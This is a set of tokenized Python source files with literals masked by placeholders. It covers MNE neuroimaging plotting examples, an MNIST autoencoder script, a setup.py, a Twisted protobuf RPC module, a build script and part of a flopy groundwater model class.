<s> """<STR_LIT>""" <EOL> import os . path as op <EOL> import mne <EOL> from mne . datasets import sample <EOL> data_path = sample . data_path ( ) <EOL> raw_empty_room_fname = op . join ( <EOL> data_path , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> raw_empty_room = mne . io . read_raw_fif ( raw_empty_room_fname ) <EOL> raw_fname = op . join ( data_path , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> raw = mne . io . read_raw_fif ( raw_fname ) <EOL> raw . info [ '<STR_LIT>' ] += [ '<STR_LIT>' ] <EOL> noise_cov = mne . compute_raw_covariance ( raw_empty_room , tmin = <NUM_LIT:0> , tmax = None ) <EOL> events = mne . find_events ( raw ) <EOL> epochs = mne . Epochs ( raw , events , event_id = <NUM_LIT:1> , tmin = - <NUM_LIT> , tmax = <NUM_LIT:0.0> , <EOL> baseline = ( - <NUM_LIT> , <NUM_LIT:0.0> ) ) <EOL> noise_cov_baseline = mne . compute_covariance ( epochs ) <EOL> noise_cov . plot ( raw_empty_room . info , proj = True ) <EOL> noise_cov_baseline . plot ( epochs . info ) <EOL> cov = mne . compute_covariance ( epochs , tmax = <NUM_LIT:0.> , method = '<STR_LIT>' ) <EOL> evoked = epochs . average ( ) <EOL> evoked . plot_white ( cov ) <EOL> covs = mne . compute_covariance ( epochs , tmax = <NUM_LIT:0.> , method = ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> return_estimators = True ) <EOL> evoked = epochs . average ( ) <EOL> evoked . plot_white ( covs ) </s>
<s> """<STR_LIT>""" <EOL> import os . path as op <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> import mne <EOL> data_path = mne . datasets . sample . data_path ( ) <EOL> fname = op . join ( data_path , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> evoked = mne . read_evokeds ( fname , baseline = ( None , <NUM_LIT:0> ) , proj = True ) <EOL> print ( evoked ) <EOL> evoked_l_aud = evoked [ <NUM_LIT:0> ] <EOL> evoked_r_aud = evoked [ <NUM_LIT:1> ] <EOL> evoked_l_vis = evoked [ <NUM_LIT:2> ] <EOL> evoked_r_vis = evoked [ <NUM_LIT:3> ] <EOL> fig = evoked_l_aud . plot ( exclude = ( ) ) <EOL> fig . tight_layout ( ) <EOL> picks = mne . pick_types ( evoked_l_aud . info , meg = True , eeg = False , eog = False ) <EOL> evoked_l_aud . plot ( spatial_colors = True , gfp = True , picks = picks ) <EOL> evoked_l_aud . plot_topomap ( ) <EOL> times = np . arange ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> evoked_r_aud . plot_topomap ( times = times , ch_type = '<STR_LIT>' ) <EOL> evoked_r_aud . plot_topomap ( times = '<STR_LIT>' , ch_type = '<STR_LIT>' ) <EOL> fig , ax = plt . subplots ( <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> evoked_l_aud . plot_topomap ( times = <NUM_LIT:0.1> , axes = ax [ <NUM_LIT:0> ] , show = False ) <EOL> evoked_r_aud . plot_topomap ( times = <NUM_LIT:0.1> , axes = ax [ <NUM_LIT:1> ] , show = False ) <EOL> evoked_l_vis . plot_topomap ( times = <NUM_LIT:0.1> , axes = ax [ <NUM_LIT:2> ] , show = False ) <EOL> evoked_r_vis . plot_topomap ( times = <NUM_LIT:0.1> , axes = ax [ <NUM_LIT:3> ] , show = True ) <EOL> ts_args = dict ( gfp = True ) <EOL> topomap_args = dict ( sensors = False ) <EOL> evoked_r_aud . plot_joint ( title = '<STR_LIT>' , times = [ <NUM_LIT> , <NUM_LIT> ] , <EOL> ts_args = ts_args , topomap_args = topomap_args ) <EOL> evoked_r_aud . plot_image ( picks = picks ) <EOL> title = '<STR_LIT>' <EOL> evoked_l_aud . plot_topo ( title = title % evoked_l_aud . 
comment ) <EOL> colors = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> mne . viz . plot_evoked_topo ( evoked , color = colors , <EOL> title = title % '<STR_LIT>' ) <EOL> subjects_dir = data_path + '<STR_LIT>' <EOL> trans_fname = data_path + '<STR_LIT>' <EOL> maps = mne . make_field_map ( evoked_l_aud , trans = trans_fname , subject = '<STR_LIT>' , <EOL> subjects_dir = subjects_dir , n_jobs = <NUM_LIT:1> ) <EOL> field_map = evoked_l_aud . plot_field ( maps , time = <NUM_LIT> ) </s>
<s> """<STR_LIT>""" <EOL> from backprop2 import Network , sigmoid_vec <EOL> import mnist_loader <EOL> import matplotlib <EOL> import matplotlib . pyplot as plt <EOL> import numpy as np <EOL> SIZE = <NUM_LIT> <EOL> HIDDEN = <NUM_LIT:30> <EOL> print "<STR_LIT>" <EOL> training_data , _ , _ = mnist_loader . load_data_nn ( ) <EOL> td_1 = [ ( x , x ) for x , _ in training_data [ <NUM_LIT:0> : SIZE ] ] <EOL> td_2 = [ ( x , x ) for x , _ in training_data [ <NUM_LIT> : <NUM_LIT> + SIZE ] ] <EOL> td_3 = [ x for x , _ in training_data [ <NUM_LIT> : <NUM_LIT> + SIZE ] ] <EOL> test = [ x for x , _ in training_data [ <NUM_LIT> : <NUM_LIT> + SIZE ] ] <EOL> print "<STR_LIT>" <EOL> ae_1 = Network ( [ <NUM_LIT> , HIDDEN , <NUM_LIT> ] ) <EOL> ae_1 . SGD ( td_1 , <NUM_LIT:4> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT> ) <EOL> print "<STR_LIT>" <EOL> ae_2 = Network ( [ <NUM_LIT> , HIDDEN , <NUM_LIT> ] ) <EOL> ae_2 . SGD ( td_1 , <NUM_LIT:4> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT> ) <EOL> print "<STR_LIT>" <EOL> encoded_td_1 = [ sigmoid_vec ( np . dot ( ae_1 . weights [ <NUM_LIT:0> ] , x ) + ae_1 . biases [ <NUM_LIT:0> ] ) <EOL> for x in td_3 ] <EOL> encoded_td_2 = [ sigmoid_vec ( np . dot ( ae_2 . weights [ <NUM_LIT:0> ] , x ) + ae_2 . biases [ <NUM_LIT:0> ] ) <EOL> for x in td_3 ] <EOL> encoded_training_data = zip ( encoded_td_1 , encoded_td_2 ) <EOL> print "<STR_LIT>" <EOL> net = Network ( [ HIDDEN , HIDDEN ] ) <EOL> net . SGD ( encoded_training_data , <NUM_LIT:6> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT> ) <EOL> print """<STR_LIT>""" <EOL> print """<STR_LIT>""" <EOL> encoded_test_1 = [ sigmoid_vec ( np . dot ( ae_1 . weights [ <NUM_LIT:0> ] , x ) + ae_1 . biases [ <NUM_LIT:0> ] ) <EOL> for x in test ] <EOL> encoded_test_2 = [ sigmoid_vec ( np . dot ( ae_2 . weights [ <NUM_LIT:0> ] , x ) + ae_2 . biases [ <NUM_LIT:0> ] ) <EOL> for x in test ] <EOL> test_data = zip ( encoded_test_1 , encoded_test_2 ) <EOL> net_baseline = Network ( [ HIDDEN , <NUM_LIT> , HIDDEN ] ) <EOL> net_baseline . 
biases [ <NUM_LIT:0> ] = ae_1 . biases [ <NUM_LIT:1> ] <EOL> net_baseline . weights [ <NUM_LIT:0> ] = ae_1 . weights [ <NUM_LIT:1> ] <EOL> net_baseline . biases [ <NUM_LIT:1> ] = ae_2 . biases [ <NUM_LIT:0> ] <EOL> net_baseline . weights [ <NUM_LIT:1> ] = ae_2 . weights [ <NUM_LIT:0> ] <EOL> error_baseline = sum ( np . linalg . norm ( net_baseline . feedforward ( x ) - y , <NUM_LIT:1> ) <EOL> for ( x , y ) in test_data ) <EOL> print "<STR_LIT>" % ( error_baseline / SIZE , ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % ( <EOL> sum ( y . mean ( ) for _ , y in test_data ) / SIZE , ) <EOL> error = sum ( np . linalg . norm ( net . feedforward ( x ) - y , <NUM_LIT:1> ) for ( x , y ) in test_data ) <EOL> print "<STR_LIT>" % ( error / SIZE , ) <EOL> print "<STR_LIT>" <EOL> fiducial_images_1 = [ <EOL> ae_1 . weights [ <NUM_LIT:0> ] [ j , : ] . reshape ( <NUM_LIT> , <NUM_LIT> ) / np . linalg . norm ( net . weights [ <NUM_LIT:0> ] [ j , : ] ) <EOL> for j in range ( HIDDEN ) ] <EOL> fiducial_images_2 = [ <EOL> ae_2 . weights [ <NUM_LIT:0> ] [ j , : ] . reshape ( <NUM_LIT> , <NUM_LIT> ) / np . linalg . norm ( net . weights [ <NUM_LIT:0> ] [ j , : ] ) <EOL> for j in range ( HIDDEN ) ] <EOL> image = np . concatenate ( [ np . concatenate ( fiducial_images_1 , axis = <NUM_LIT:1> ) , <EOL> np . concatenate ( fiducial_images_2 , axis = <NUM_LIT:1> ) ] ) <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . matshow ( image , cmap = matplotlib . cm . binary ) <EOL> plt . xticks ( np . array ( [ ] ) ) <EOL> plt . yticks ( np . array ( [ ] ) ) <EOL> plt . show ( ) </s>
<s> class DownloaderError ( Exception ) : <EOL> def __init__ ( self , value ) : <EOL> self . value = value <EOL> def __str__ ( self ) : <EOL> return repr ( self . value ) </s>
<s> import os <EOL> from setuptools import setup <EOL> EXTRAS = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> } <EOL> EXTRAS [ '<STR_LIT:all>' ] = ( <EOL> EXTRAS [ '<STR_LIT>' ] + <EOL> EXTRAS [ '<STR_LIT>' ] + <EOL> EXTRAS [ '<STR_LIT>' ] + <EOL> EXTRAS [ '<STR_LIT>' ] <EOL> ) <EOL> try : <EOL> from setuptools . command import egg_info <EOL> egg_info . write_toplevel_names <EOL> except ( ImportError , AttributeError ) : <EOL> pass <EOL> else : <EOL> def _top_level_package ( name ) : <EOL> return name . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> def _hacked_write_toplevel_names ( cmd , basename , filename ) : <EOL> pkgs = dict . fromkeys ( <EOL> [ _top_level_package ( k ) <EOL> for k in cmd . distribution . iter_distribution_names ( ) <EOL> if _top_level_package ( k ) != "<STR_LIT>" <EOL> ] <EOL> ) <EOL> cmd . write_file ( "<STR_LIT>" , filename , '<STR_LIT:\n>' . join ( pkgs ) + '<STR_LIT:\n>' ) <EOL> egg_info . write_toplevel_names = _hacked_write_toplevel_names <EOL> def read ( fname ) : <EOL> return open ( os . path . join ( os . path . dirname ( __file__ ) , fname ) ) . 
read ( ) <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> maintainer = "<STR_LIT>" , <EOL> maintainer_email = "<STR_LIT>" , <EOL> description = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> license = "<STR_LIT>" , <EOL> keywords = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> package_data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> } , <EOL> zip_safe = False , <EOL> long_description = read ( '<STR_LIT>' ) , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> extras_require = EXTRAS , <EOL> ) </s>
<s> import sys <EOL> import shlex <EOL> import six <EOL> PY2 = sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> <EOL> if PY2 : <EOL> from BaseHTTPServer import BaseHTTPRequestHandler <EOL> from urlparse import urlsplit , parse_qs <EOL> else : <EOL> from http . server import BaseHTTPRequestHandler <EOL> from urllib . parse import urlsplit , parse_qs <EOL> text_type = six . text_type <EOL> byte_type = six . binary_type <EOL> basestring = six . string_types <EOL> def encode_utf8 ( s ) : <EOL> if isinstance ( s , text_type ) : <EOL> s = s . encode ( '<STR_LIT:utf-8>' ) <EOL> return byte_type ( s ) <EOL> def decode_utf8 ( s ) : <EOL> if isinstance ( s , byte_type ) : <EOL> s = s . decode ( "<STR_LIT:utf-8>" ) <EOL> return text_type ( s ) <EOL> def shsplit ( s ) : <EOL> if PY2 : <EOL> s = encode_utf8 ( s ) <EOL> else : <EOL> s = decode_utf8 ( s ) <EOL> return shlex . split ( s ) </s>
<s> import twisted . internet . protocol <EOL> from twisted . internet import reactor <EOL> from twisted . internet . defer import Deferred <EOL> from twisted . protocols . basic import Int32StringReceiver <EOL> from twisted . internet . protocol import DatagramProtocol <EOL> import google . protobuf . service <EOL> from protobufrpc_pb2 import Rpc , Request , Response , Error <EOL> from common import Controller <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> class BaseChannel ( google . protobuf . service . RpcChannel ) : <EOL> id = <NUM_LIT:0> <EOL> def __init__ ( self ) : <EOL> google . protobuf . service . RpcChannel . __init__ ( self ) <EOL> self . _pending = { } <EOL> self . _services = { } <EOL> def add_service ( self , service ) : <EOL> self . _services [ service . GetDescriptor ( ) . name ] = service <EOL> def unserialize_response ( self , serializedResponse , responseClass , rpcController ) : <EOL> response = responseClass ( ) <EOL> if serializedResponse . error : <EOL> rpcController . setFailed ( serializedResponse . error . text ) <EOL> else : <EOL> response . ParseFromString ( serializedResponse . serialized_response ) <EOL> return response , rpcController <EOL> def serialize_response ( self , response , serializedRequest , controller ) : <EOL> serializedResponse = Response ( ) <EOL> serializedResponse . id = serializedRequest . id <EOL> if controller . Failed ( ) : <EOL> serializedResponse . error . code = <NUM_LIT:1> <EOL> serializedResponse . error . text = controller . ErrorText ( ) <EOL> else : <EOL> serializedResponse . serialized_response = response . SerializeToString ( ) <EOL> return serializedResponse <EOL> def serialize_rpc ( self , serializedResponse ) : <EOL> rpc = Rpc ( ) <EOL> rpcResponse = rpc . response . add ( ) <EOL> rpcResponse . serialized_response = serializedResponse . serialized_response <EOL> rpcResponse . id = serializedResponse . id <EOL> if serializedResponse . error . 
code != <NUM_LIT:0> : <EOL> rpcResponse . error . code = serializedResponse . error . code <EOL> rpcResponse . error . text = serializedResponse . error . text <EOL> return rpc <EOL> def _call_method ( self , methodDescriptor , rpcController , request , responseClass , done ) : <EOL> self . id += <NUM_LIT:1> <EOL> d = Deferred ( ) <EOL> d . addCallback ( self . unserialize_response , responseClass , rpcController ) <EOL> d . addCallback ( done ) <EOL> self . _pending [ self . id ] = d <EOL> rpc = Rpc ( ) <EOL> rpcRequest = rpc . request . add ( ) <EOL> rpcRequest . method = methodDescriptor . containing_service . name + '<STR_LIT:.>' + methodDescriptor . name <EOL> rpcRequest . serialized_request = request . SerializeToString ( ) <EOL> rpcRequest . id = self . id <EOL> return rpc <EOL> def CallMethod ( self , methodDescriptor , rpcController , request , responseClass , done ) : <EOL> pass <EOL> class RpcErrors : <EOL> SUCCESS = <NUM_LIT:0> <EOL> UNSERIALIZE_RPC = <NUM_LIT:1> <EOL> SERVICE_NOT_FOUND = <NUM_LIT:2> <EOL> METHOD_NOT_FOUND = <NUM_LIT:3> <EOL> CANNOT_DESERIALIZE_REQUEST = <NUM_LIT:4> <EOL> msgs = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> class TcpChannel ( BaseChannel , Int32StringReceiver ) : <EOL> def CallMethod ( self , methodDescriptor , rpcController , request , responseClass , done ) : <EOL> rpc = self . _call_method ( methodDescriptor , rpcController , request , responseClass , done ) <EOL> self . sendString ( rpc . SerializeToString ( ) ) <EOL> def stringReceived ( self , data ) : <EOL> rpc = Rpc ( ) <EOL> rpc . ParseFromString ( data ) <EOL> for serializedRequest in rpc . request : <EOL> service = self . _services [ serializedRequest . method . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] ] <EOL> if not service : <EOL> self . sendError ( serializedRequest . id , RpcErrors . SERVICE_NOT_FOUND ) <EOL> return <EOL> method = service . GetDescriptor ( ) . FindMethodByName ( serializedRequest . 
method . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> ] ) <EOL> if not method : <EOL> self . sendError ( serializedRequest . id , RpcErrors . METHOD_NOT_FOUND ) <EOL> return <EOL> request = service . GetRequestClass ( method ) ( ) <EOL> request . ParseFromString ( serializedRequest . serialized_request ) <EOL> controller = Controller ( ) <EOL> d = Deferred ( ) <EOL> d . addCallback ( self . serialize_response , serializedRequest , controller ) <EOL> d . addCallback ( self . serialize_rpc ) <EOL> d . addCallback ( lambda rpc : self . sendString ( rpc . SerializeToString ( ) ) ) <EOL> service . CallMethod ( method , controller , request , d . callback ) <EOL> for serializedResponse in rpc . response : <EOL> id = serializedResponse . id <EOL> if self . _pending . has_key ( id ) : <EOL> self . _pending [ id ] . callback ( serializedResponse ) <EOL> def sendError ( self , id , code ) : <EOL> rpc = Rpc ( ) <EOL> rpcResponse = rpc . response . add ( ) <EOL> rpcResponse . id = id <EOL> rpcResponse . error . code = code <EOL> rpcResponse . error . text = RpcErrors . msgs [ code ] <EOL> self . sendString ( rpc . SerializeToString ( ) ) <EOL> class UdpChannel ( BaseChannel , DatagramProtocol ) : <EOL> def __init__ ( self , host = None , port = None ) : <EOL> self . _host = host <EOL> self . _port = port <EOL> self . connected = False <EOL> BaseChannel . __init__ ( self ) <EOL> def startProtocol ( self ) : <EOL> if self . _host and self . _port : <EOL> self . transport . connect ( self . _host , self . _port ) <EOL> self . connected = True <EOL> def datagramReceived ( self , data , ( host , port ) ) : <EOL> rpc = Rpc ( ) <EOL> rpc . ParseFromString ( data ) <EOL> for serializedRequest in rpc . request : <EOL> service = self . _services [ serializedRequest . method . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] ] <EOL> if not service : <EOL> self . sendError ( serializedRequest . id , RpcErrors . SERVICE_NOT_FOUND , host , port ) <EOL> return <EOL> method = service . GetDescriptor ( ) . 
FindMethodByName ( serializedRequest . method . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> ] ) <EOL> if not method : <EOL> self . sendError ( serializedRequest . id , RpcErrors . METHOD_NOT_FOUND , host , port ) <EOL> return <EOL> request = service . GetRequestClass ( method ) ( ) <EOL> request . ParseFromString ( serializedRequest . serialized_request ) <EOL> controller = Controller ( ) <EOL> d = Deferred ( ) <EOL> d . addCallback ( self . serialize_response , serializedRequest ) <EOL> d . addCallback ( self . serialize_rpc ) <EOL> d . addCallback ( lambda rpc : self . send_string ( rpc . SerializeToString ( ) , host , port ) ) <EOL> service . CallMethod ( method , controller , request , d . callback ) <EOL> for serializedResponse in rpc . response : <EOL> id = serializedResponse . id <EOL> if self . _pending . has_key ( id ) : <EOL> self . _pending [ id ] . callback ( serializedResponse ) <EOL> def send_string ( self , data , host = None , port = None ) : <EOL> if host and port : <EOL> self . transport . write ( data , ( host , port ) ) <EOL> else : <EOL> self . transport . write ( data ) <EOL> def CallMethod ( self , methodDescriptor , rpcController , request , responseClass , done ) : <EOL> rpc = self . _call_method ( methodDescriptor , request , responseClass , done ) <EOL> self . send_string ( rpc . SerializeToString ( ) ) <EOL> def sendError ( self , id , code , host , port ) : <EOL> rpc = Rpc ( ) <EOL> rpcResponse = rpc . response . add ( ) <EOL> rpcResponse . id = id <EOL> rpcResponse . error . code = code <EOL> rpcResponse . error . text = RpcErrors . msgs [ code ] <EOL> self . sendString ( rpc . SerializeToString ( ) , host , port ) <EOL> class Factory ( twisted . internet . protocol . Factory ) : <EOL> protocol = TcpChannel <EOL> def __init__ ( self , * services ) : <EOL> self . _protocols = [ ] <EOL> self . _services = { } <EOL> for s in services : <EOL> self . _services [ s . GetDescriptor ( ) . 
name ] = s <EOL> def buildProtocol ( self , addr ) : <EOL> p = self . protocol ( ) <EOL> p . factory = self <EOL> p . _services = self . _services <EOL> self . _protocols . append ( p ) <EOL> return p <EOL> class Proxy ( object ) : <EOL> class _Proxy ( object ) : <EOL> def __init__ ( self , stub ) : <EOL> self . _stub = stub <EOL> def __getattr__ ( self , key ) : <EOL> def call ( method , request ) : <EOL> d = Deferred ( ) <EOL> controller = Controller ( ) <EOL> method ( controller , request , d . callback ) <EOL> return d <EOL> return lambda request : call ( getattr ( self . _stub , key ) , request ) <EOL> def __init__ ( self , * stubs ) : <EOL> self . _stubs = { } <EOL> for s in stubs : <EOL> self . _stubs [ s . GetDescriptor ( ) . name ] = self . _Proxy ( s ) <EOL> def __getattr__ ( self , key ) : <EOL> return self . _stubs [ key ] </s>
<s> import os <EOL> import sys <EOL> import platform <EOL> import subprocess <EOL> from updateversion import update_version <EOL> def build_distribution ( upd = False , utag = False , install = False , <EOL> reg = False , winbuild = False , <EOL> major = False , minor = False ) : <EOL> if upd : <EOL> update_version ( utag , major , minor ) <EOL> if install : <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if winbuild : <EOL> if '<STR_LIT>' in platform . system ( ) . lower ( ) : <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if reg : <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> uver = False <EOL> install = False <EOL> utag = False <EOL> register = False <EOL> winbuild = False <EOL> major = False <EOL> minor = False <EOL> for arg in sys . argv : <EOL> if arg . lower ( ) == '<STR_LIT>' or arg . lower ( ) == '<STR_LIT>' : <EOL> uver = True <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> elif arg . lower ( ) == '<STR_LIT>' or arg . lower ( ) == '<STR_LIT>' : <EOL> install = True <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> elif arg . lower ( ) == '<STR_LIT>' or arg . lower ( ) == '<STR_LIT>' : <EOL> register = True <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> elif arg . lower ( ) == '<STR_LIT>' or arg . lower ( ) == '<STR_LIT>' : <EOL> utag = True <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> elif arg . lower ( ) == '<STR_LIT>' or arg . lower ( ) == '<STR_LIT>' : <EOL> winbuild = True <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> elif arg . lower ( ) == '<STR_LIT>' or arg . lower ( ) == '<STR_LIT>' : <EOL> major = True <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> elif arg . 
lower ( ) == '<STR_LIT>' or arg . lower ( ) == '<STR_LIT>' : <EOL> minor = True <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> build_distribution ( uver , utag , install , <EOL> register , winbuild , major , minor ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import sys <EOL> import os <EOL> import subprocess as sp <EOL> import copy <EOL> import numpy as np <EOL> from flopy import utils <EOL> iconst = <NUM_LIT:1> <EOL> iprn = - <NUM_LIT:1> <EOL> def is_exe ( fpath ) : <EOL> return os . path . isfile ( fpath ) and os . access ( fpath , os . X_OK ) <EOL> def which ( program ) : <EOL> fpath , fname = os . path . split ( program ) <EOL> if fpath : <EOL> if is_exe ( program ) : <EOL> return program <EOL> else : <EOL> if is_exe ( program ) : <EOL> return program <EOL> for path in os . environ [ "<STR_LIT>" ] . split ( os . pathsep ) : <EOL> path = path . strip ( '<STR_LIT:">' ) <EOL> exe_file = os . path . join ( path , program ) <EOL> if is_exe ( exe_file ) : <EOL> return exe_file <EOL> return None <EOL> class BaseModel ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , modelname = '<STR_LIT>' , namefile_ext = '<STR_LIT>' , <EOL> exe_name = '<STR_LIT>' , model_ws = None , <EOL> structured = True , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . __name = modelname <EOL> self . namefile_ext = namefile_ext <EOL> self . namefile = self . __name + '<STR_LIT:.>' + self . namefile_ext <EOL> self . packagelist = [ ] <EOL> self . heading = '<STR_LIT>' <EOL> self . exe_name = exe_name <EOL> self . external_extension = '<STR_LIT>' <EOL> if model_ws is None : model_ws = os . getcwd ( ) <EOL> if not os . path . exists ( model_ws ) : <EOL> try : <EOL> os . makedirs ( model_ws ) <EOL> except : <EOL> print ( <EOL> '<STR_LIT>' . format ( <EOL> model_ws , os . getcwd ( ) ) ) <EOL> model_ws = os . getcwd ( ) <EOL> self . _model_ws = model_ws <EOL> self . structured = structured <EOL> self . pop_key_list = [ ] <EOL> self . cl_params = '<STR_LIT>' <EOL> xul = kwargs . pop ( "<STR_LIT>" , None ) <EOL> yul = kwargs . pop ( "<STR_LIT>" , None ) <EOL> rotation = kwargs . pop ( "<STR_LIT>" , <NUM_LIT:0.0> ) <EOL> proj4_str = kwargs . 
pop ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . start_datetime = kwargs . pop ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . _sr = utils . SpatialReference ( xul = xul , yul = yul , rotation = rotation , <EOL> proj4_str = proj4_str ) <EOL> self . array_free_format = True <EOL> self . array_format = None <EOL> self . external_fnames = [ ] <EOL> self . external_units = [ ] <EOL> self . external_binflag = [ ] <EOL> self . package_units = [ ] <EOL> return <EOL> def set_free_format ( self , value = True ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( value , bool ) : <EOL> print ( '<STR_LIT>' ) <EOL> return False <EOL> self . array_free_format = value <EOL> def get_free_format ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . array_free_format <EOL> def next_ext_unit ( self ) : <EOL> """<STR_LIT>""" <EOL> next_unit = self . _next_ext_unit + <NUM_LIT:1> <EOL> self . _next_ext_unit += <NUM_LIT:1> <EOL> return next_unit <EOL> def export ( self , f , ** kwargs ) : <EOL> from . export import utils <EOL> return utils . model_helper ( f , self , ** kwargs ) <EOL> def add_package ( self , p ) : <EOL> """<STR_LIT>""" <EOL> for u in p . unit_number : <EOL> if u in self . package_units or u in self . external_units : <EOL> print ( "<STR_LIT>" . format ( <EOL> u , p . name ) ) <EOL> self . package_units . append ( u ) <EOL> for i , pp in enumerate ( self . packagelist ) : <EOL> if pp . allowDuplicates : <EOL> continue <EOL> elif isinstance ( p , type ( pp ) ) : <EOL> print ( '<STR_LIT>' , <EOL> type ( p ) , type ( pp ) ) <EOL> print ( '<STR_LIT>' ) <EOL> self . packagelist [ i ] = p <EOL> return <EOL> if self . verbose : <EOL> print ( '<STR_LIT>' , p . name [ <NUM_LIT:0> ] ) <EOL> self . packagelist . append ( p ) <EOL> def remove_package ( self , pname ) : <EOL> """<STR_LIT>""" <EOL> for i , pp in enumerate ( self . packagelist ) : <EOL> if pname in pp . name : <EOL> if self . verbose : <EOL> print ( '<STR_LIT>' , pp . name ) <EOL> self . packagelist . 
pop ( i ) <EOL> return <EOL> raise StopIteration ( <EOL> '<STR_LIT>' + pname + '<STR_LIT>' ) <EOL> def __getattr__ ( self , item ) : <EOL> """<STR_LIT>""" <EOL> if item == '<STR_LIT>' : <EOL> if self . dis is not None : <EOL> self . _sr . reset ( delr = self . dis . delr . array , <EOL> delc = self . dis . delc . array , <EOL> lenuni = self . dis . lenuni ) <EOL> return self . _sr <EOL> return self . get_package ( item ) <EOL> def add_external ( self , fname , unit , binflag = False ) : <EOL> """<STR_LIT>""" <EOL> if fname in self . external_fnames : <EOL> print ( "<STR_LIT>" + <EOL> "<STR_LIT>" . format ( fname ) ) <EOL> idx = self . external_fnames . index ( fname ) <EOL> self . external_fnames . pop ( idx ) <EOL> self . external_units . pop ( idx ) <EOL> self . external_binflag . pop ( idx ) <EOL> self . external_fnames . append ( fname ) <EOL> self . external_units . append ( unit ) <EOL> self . external_binflag . append ( binflag ) <EOL> return <EOL> def remove_external ( self , fname = None , unit = None ) : <EOL> """<STR_LIT>""" <EOL> if fname is not None : <EOL> for i , e in enumerate ( self . external_fnames ) : <EOL> if fname in e : <EOL> self . external_fnames . pop ( i ) <EOL> self . external_units . pop ( i ) <EOL> self . external_binflag . pop ( i ) <EOL> elif unit is not None : <EOL> for i , u in enumerate ( self . external_units ) : <EOL> if u == unit : <EOL> self . external_fnames . pop ( i ) <EOL> self . external_units . pop ( i ) <EOL> self . external_binflag . pop ( i ) <EOL> else : <EOL> raise Exception ( <EOL> '<STR_LIT>' ) <EOL> return <EOL> def get_name_file_entries ( self ) : <EOL> """<STR_LIT>""" <EOL> s = '<STR_LIT>' <EOL> for p in self . packagelist : <EOL> for i in range ( len ( p . name ) ) : <EOL> if p . unit_number [ i ] == <NUM_LIT:0> : <EOL> continue <EOL> s = s + ( '<STR_LIT>' . format ( p . name [ i ] , <EOL> p . unit_number [ <EOL> i ] , <EOL> p . file_name [ i ] , <EOL> p . 
